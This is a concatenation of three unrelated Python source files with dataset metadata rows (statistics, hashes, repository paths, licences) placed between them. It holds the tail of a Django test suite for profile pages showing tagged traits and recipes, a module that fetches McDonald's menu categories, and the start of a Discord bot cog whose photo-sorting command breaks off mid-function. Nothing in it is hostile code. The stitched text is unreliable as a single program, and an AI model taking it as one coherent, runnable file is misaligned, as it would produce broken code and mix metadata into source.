all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_trait_tagged_by_other_user(self):
"""The list of 'my tagged traits' does not include traits tagged by another user."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_archived_tagged_trait(self):
"""The list of 'my tagged traits' does not include an archived tagged trait."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(archived_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_delete_link_present_for_unreviewed_taggedtrait(self):
"""The taggedtrait delete link is present in the html for a taggedtrait that is not reviewed."""
tagged_trait = TaggedTraitFactory.create(creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_confirmed_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that is confirmed."""
dcc_review = DCCReviewFactory.create(status=DCCReview.STATUS_CONFIRMED, tagged_trait__creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_needsfollowup_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that needs followup."""
dcc_review = DCCReviewFactory.create(status=DCCReview.STATUS_FOLLOWUP, tagged_trait__creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_no_deprecated_tagged_traits(self):
"""The list of 'my tagged traits' does not include deprecated tagged traits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
class RecipeSubmitterLoginTestCaseProfileTest(RecipeSubmitterLoginTestCase):
def setUp(self):
super(RecipeSubmitterLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('show_tabs', context)
self.assertTrue(context['show_tabs'])
self.assertIn('show_recipes', context)
self.assertIn('unit_recipe_table', context)
self.assertIn('harmonization_recipe_table', context)
self.assertNotIn('user_taggedtraits', context)
self.assertNotIn('study_taggedtrait_counts', context)
def test_has_no_tagged_phenotypes_tabs(self):
"""Recipe submitter does not see 'my tagged variables' or 'tagged variables in my studies'."""
response = self.client.get(self.get_url())
context = response.context
self.assertNotContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_has_recipes_tabs(self):
"""Recipe submitter sees both recipes tabs."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_recipes'])
self.assertContains(response, 'id="unitrecipes"')
self.assertContains(response, 'id="harmonizationrecipes"')
def test_has_correct_recipe_count(self):
"""Tables of recipes have the correct number of rows for this user."""
unit_recipes = UnitRecipeFactory.create_batch(10, creator=self.user)
harmonization_recipes = HarmonizationRecipeFactory.create_batch(10, creator=self.user)
other_unit_recipe = UnitRecipeFactory.create()
other_harmonization_recipe = HarmonizationRecipeFactory.create()
response = self.client.get(self.get_url())
context = response.context
self.assertNotIn(other_unit_recipe, context['unit_recipe_table'].data)
self.assertNotIn(other_harmonization_recipe, context['harmonization_recipe_table'].data)
self.assertEqual(len(context['unit_recipe_table'].rows), len(unit_recipes))
self.assertEqual(len(context['harmonization_recipe_table'].rows), len(harmonization_recipes))
class PhenotypeTaggerLoginTestCaseProfileTest(PhenotypeTaggerLoginTestCase):
def setUp(self):
super(PhenotypeTaggerLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_tabs'])
self.assertFalse(context['show_recipes'])
self.assertTrue(context['show_my_tagged'])
self.assertTrue(context['show_study_tagged'])
self.assertNotIn('unit_recipe_table', context)
self.assertNotIn('harmonization_recipe_table', context)
self.assertIn('user_taggedtraits', context)
self.assertIn('study_taggedtrait_counts', context)
def test_has_correct_tagged_phenotypes_tabs(self):
"""Tagger user does see My Tagged Phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertContains(response, 'id="user_tagged_phenotypes"')
self.assertContains(response, 'id="study_tagged_phenotypes"')
def test_has_no_recipes_tabs(self):
"""Regular user does not see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_recipes'])
self.assertNotContains(response, 'id="unitrecipes"')
self.assertNotContains(response, 'id="harmonizationrecipes"')
def test_my_tagged_variables_correct_empty(self):
"""The list of 'my tagged traits' is correct when the user has no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['user_taggedtraits'], [])
def test_my_tagged_variables_correct_count(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits when one is archived."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_trait_tagged_by_other_user(self):
"""The list of 'my tagged traits' does not include traits tagged by another user."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_archived_tagged_trait(self):
"""The list of 'my tagged traits' does not include an archived tagged trait."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(archived_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_study_tagged_variables_correct_empty(self):
"""The counts of 'tagged variables from my studies' is correct when the study and user have no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['study_taggedtrait_counts'], [])
def test_study_tagged_variables_correct_count(self):
"""The counts of 'tagged variables from my studies' has the correct count of taggedtraits."""
user_tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
other_study_taggedtrait = TaggedTraitFactory.create()
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertNotIn(other_study_taggedtrait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The counts of 'tagged variables from my studies' does not include an archived tagged trait."""
user_tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
archived_taggedtrait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study, archived=True,
tag=user_tagged_trait.tag)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_includes_trait_tagged_by_other_user(self):
"""The counts of 'tagged variables from my studies' does include traits tagged by another user."""
user_tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
other_user_taggedtrait = TaggedTraitFactory.create(
tag=user_tagged_trait.tag,
trait__source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 2)
def test_study_tagged_variables_excludes_archived_tagged_trait(self):
"""The counts of 'tagged variables from my studies' does not include an archived tagged trait."""
user_tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
archived_taggedtrait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study, archived=True,
tag=user_tagged_trait.tag)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_delete_link_present_for_unreviewed_taggedtrait(self):
"""The taggedtrait delete link is present in the html for a taggedtrait that is not reviewed."""
tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_confirmed_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that is confirmed."""
dcc_review = DCCReviewFactory.create(
status=DCCReview.STATUS_CONFIRMED,
tagged_trait__creator=self.user,
tagged_trait__trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_needsfollowup_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that needs followup."""
dcc_review = DCCReviewFactory.create(
status=DCCReview.STATUS_FOLLOWUP,
tagged_trait__creator=self.user,
tagged_trait__trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_study_tagged_variables_correct_count_with_deprecated_trait(self):
"""The counts of 'tagged variables from my studies' does not include a deprecated tagged trait."""
study = StudyFactory.create()
tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=self.study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(tagged_trait.tag.pk, study1_tag_pks)
self.assertNotIn(other_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_excludes_deprecated_tagged_traits(self):
"""The list of 'my tagged traits' does not include deprecated tagged traits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
class ProfilesLoginRequiredTestCase(LoginRequiredTestCase):
def test_profiles_login_required(self):
"""All profiles urls redirect to login page if no user is logged in."""
self.assert_redirect_all_urls('profiles')
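# The tests above repeat the same two-step unnesting of context['user_taggedtraits']
# in many places. A minimal sketch of a helper the assertions could share is shown
# below; extract_taggedtrait_pks is a hypothetical name and is not part of the
# application code under test.
def extract_taggedtrait_pks(user_taggedtraits):
    """Flatten the (study, [(tag, taggedtraits)]) context structure into a flat list of
    taggedtrait primary keys, mirroring the inline list comprehensions above."""
    pks = []
    for study, tag_taggedtraits in user_taggedtraits:
        for tag, taggedtraits in tag_taggedtraits:
            for el in taggedtraits:
                pks.append(el['taggedtrait_pk'])
    return pks
# Usage in a test would then be, e.g.:
#     all_tagged_trait_pks = extract_taggedtrait_pks(context['user_taggedtraits'])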
| 57.930403
| 190
| 0.715934
| 3,971
| 31,630
| 5.386301
| 0.045832
| 0.067885
| 0.0432
| 0.052457
| 0.930993
| 0.926972
| 0.912338
| 0.902052
| 0.892842
| 0.883117
| 0
| 0.004484
| 0.189187
| 31,630
| 545
| 191
| 58.036697
| 0.829525
| 0.105786
| 0
| 0.863014
| 0
| 0
| 0.083541
| 0.034315
| 0
| 0
| 0
| 0
| 0.251142
| 1
| 0.116438
| false
| 0
| 0.013699
| 0.009132
| 0.150685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20a0c23023d15457deefb5e0806c84027bf4d2da
| 4,099
|
py
|
Python
|
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | 2
|
2021-04-26T20:51:09.000Z
|
2021-04-28T02:55:16.000Z
|
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | null | null | null |
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | null | null | null |
import json
import os
import requests
from dotenv import load_dotenv
load_dotenv()
region = os.getenv('region')
def beverages():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100000.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def breakfast():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100001.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def condiments():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100002.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def desserts():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100003.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
# There is a salad category but it is empty, go figure!
def salad():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100004.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def beef():
if region == 'gb':
food = requests.get(f"https://www.mcdonalds.com/services/mcd/categoryDetails.gb.en-gb.100038.true.true..false.json")
else:
food = requests.get(f"https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100005.true.true..false.json")
get_json = food.json()
result = json.dumps(get_json)
return result
def sides():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100006.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def chicken():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100007.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def mccafe():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100008.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeals():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100009.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_entree():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100010.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_sides():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100011.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_drinks():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100012.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_yogurt():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100013.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def sandwiches():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100014.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def valuepicks():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100015.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def hidden():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100016.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def featured():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100019.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
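# Every function above fetches the same categoryDetails endpoint with a different
# numeric category id. A minimal sketch of a shared helper is shown below; get_category
# is a hypothetical name, not part of the published module, and it assumes the same
# ca.en-ca locale and id scheme used above.
def get_category(category_id, locale='ca.en-ca'):
    """Fetch one menu category and return it as a JSON string, matching the behaviour
    of the individual functions above."""
    url = ('https://www.mcdonalds.com/services/mcd/categoryDetails.'
           f'{locale}.{category_id}.true.true..false.json')
    food = requests.get(url)
    return json.dumps(food.json())
# For example, desserts() could simply return get_category(100003).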
| 23.289773
| 118
| 0.72969
| 612
| 4,099
| 4.818627
| 0.124183
| 0.085453
| 0.096643
| 0.128857
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0
| 0.031319
| 0.111979
| 4,099
| 175
| 119
| 23.422857
| 0.778846
| 0.01293
| 0
| 0.55102
| 0
| 0.193878
| 0.433944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.030612
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20db55c44b1b5f72e6bb3171210f5f6fcfb23404
| 182
|
py
|
Python
|
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | 6
|
2020-04-17T10:13:28.000Z
|
2020-10-13T08:16:32.000Z
|
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | null | null | null |
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | 1
|
2021-05-14T08:11:08.000Z
|
2021-05-14T08:11:08.000Z
|
from core.models.mobilenet_v3.get_mobilenet import large, large_minimalistic, small, small_minimalistic, edge_tpu
import core.models.mobilenet_v3.mobilenet_v3 as origin_mobilenet_v3
| 60.666667
| 113
| 0.879121
| 27
| 182
| 5.592593
| 0.518519
| 0.291391
| 0.251656
| 0.278146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023529
| 0.065934
| 182
| 2
| 114
| 91
| 0.864706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4555b245f70b887fce2bd8e8a18659c525897171
| 21,144
|
py
|
Python
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 5
|
2021-07-16T21:12:14.000Z
|
2022-03-12T18:59:47.000Z
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 1
|
2021-12-02T06:43:55.000Z
|
2021-12-02T06:43:55.000Z
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 8
|
2021-08-08T21:35:42.000Z
|
2022-02-18T20:21:48.000Z
|
import functions
import requests
import discord
from discord.ext import commands
def reset_txt(txt):
print("Reset")
open(txt, 'w').close()
class Legacy(commands.Cog):
def __init__(self, client):
self.client = client
# LEGACY COMMANDS
# CMD-SORTBY
@commands.command()
@commands.check(functions.beta_tester)
async def lsortby(self, ctx, profile, mode):
functions.log(ctx.guild.name, ctx.author, ctx.command)
account = functions.check_account_existence_and_return(profile)
if account:
photos = functions.id_to_photos(account['account_id'])
if photos:
mode = mode.lower()
reverse_sort = True
if mode == "cheers":
mode = lambda i: i["CheerCount"]
file_name = f"Sorted by CHEERS {account['username']}.txt"
reverse_sort = True
elif mode == "comments":
mode = lambda i: i["CommentCount"]
file_name = f"Sorted by COMMENTS {account['username']}.txt"
reverse_sort = True
elif mode == "oldest":
mode = lambda i: i["CreatedAt"]
file_name = f"Sorted by OLDEST {account['username']}.txt"
reverse_sort = False
elif mode == "latest":
mode = lambda i: i["CreatedAt"]
file_name = f"Sorted by LATEST {account['username']}.txt"
reverse_sort = True
else:
mode = None
if mode:
save_msg = ""
sorted_photos = sorted(photos, key = mode, reverse = reverse_sort)
with open("temp_txt.txt","w") as text_file:
for photo in sorted_photos:
save_msg += f"https://rec.net/image/{photo['Id']}\n"
save_msg += f"Date: {photo['CreatedAt'][:10]} {photo['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {photo['CheerCount']}\n"
save_msg += f"Comments: {photo['CommentCount']}\n"
save_msg += "\n"
text_file.write(save_msg)
with open("temp_txt.txt","rb") as text_file:
await ctx.send(file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
embed = functions.error_msg(ctx, "Invalid mode! Modes are `cheers`, `comments`, `latest`, `oldest`")
else:
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture!")
else: # account doesn't exist
embed = functions.error_msg(ctx, f"User `@{profile}` doesn't exist!")
functions.embed_footer(ctx, embed) # get default footer from function
await ctx.send(embed=embed)
@lsortby.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in an username and mode! \nUsage: `.lsortby <user> <latest|oldest|cheers|comments>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TOGETHER
@commands.command()
@commands.check(functions.beta_tester)
async def ltogether(self, ctx, user1, user2):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
user1_account = functions.check_account_existence_and_return(user1)
user2_account = functions.check_account_existence_and_return(user2)
if user1_account and user2_account: #if both exist
user1_feed = functions.id_to_feed(user1_account['account_id'])
if user1_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
